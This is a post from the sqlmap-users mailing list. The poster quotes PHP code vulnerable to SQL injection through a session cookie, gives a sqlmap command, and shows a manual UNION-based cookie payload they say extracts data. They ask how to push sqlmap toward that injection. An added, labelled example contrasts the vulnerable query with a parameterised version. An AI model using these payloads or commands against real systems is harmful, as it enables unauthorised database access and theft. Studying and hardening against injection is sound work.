Hi all,
Trying to do a (simple) injection with sqlmap, and I can't seem to coax it
into getting it right.
The PHP source looks something like:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata
AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid
= '{$_COOKIE['sesh']}')");
and then it displays the fields it pulled out.
The command(s) I've tried look something like ./sqlmap.py -u
site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
--risk=5. However, the only injection point it finds is AND/OR time-based
blind, which is horribly slow. Of course, manually, I can do a
sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
I'm definitely able to pull out results.
Anything I can do to push sqlmap in the right direction?
Thanks,
ss23
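
For the defensive side of the query quoted in the post, here is an added example (not the poster's code and not part of sqlmap) that puts the concatenated pattern beside a bound-parameter version of the same nested query. It assumes PHP with the pdo_sqlite driver and uses an in-memory SQLite database; the table and column names come from the post, the rows are constructed.

```php
<?php
// Added example. Table/column names are from the post; the rows and the
// in-memory SQLite database are constructed so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ccc_users (userid INTEGER, sessionid TEXT)");
$db->exec("CREATE TABLE custdata (userid INTEGER, custname TEXT,
                                  custemail TEXT, owing REAL)");
$db->exec("INSERT INTO ccc_users VALUES (1, 'a3f9c0'), (2, 'b77e21')");
$db->exec("INSERT INTO custdata VALUES
           (1, 'Alice', 'alice@example.test', 10.0),
           (2, 'Bob',   'bob@example.test',   25.5)");

// Pattern from the post: the cookie value becomes part of the SQL text, so a
// quote and a parenthesis inside it end the subquery and alter the statement.
function lookup_concat(PDO $db, string $sesh): array {
    $sql = "SELECT userid, custname, custemail, owing FROM custdata AS cd
            WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
                               WHERE sessionid = '$sesh')";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened form: the SQL text is fixed and the cookie is bound as a value,
// so it can only ever be compared against sessionid.
function lookup_bound(PDO $db, string $sesh): array {
    $stmt = $db->prepare(
        "SELECT userid, custname, custemail, owing FROM custdata AS cd
         WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
                            WHERE sessionid = :sesh)");
    $stmt->execute([':sesh' => $sesh]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// URL-decoded form of the cookie value quoted in the post.
$from_post = "') UNION select 1,2,3,4 -- ";
$valid     = 'a3f9c0'; // constructed session id

foreach (['concatenated' => 'lookup_concat', 'bound' => 'lookup_bound'] as $name => $fn) {
    printf("%-12s valid session -> %d row(s)\n", $name, count($fn($db, $valid)));
    printf("%-12s value in post -> %d row(s)\n", $name, count($fn($db, $from_post)));
}
```

With the bound version the value from the post matches no session, so no rows come back, while a valid session id returns the same customer row from both functions.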
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users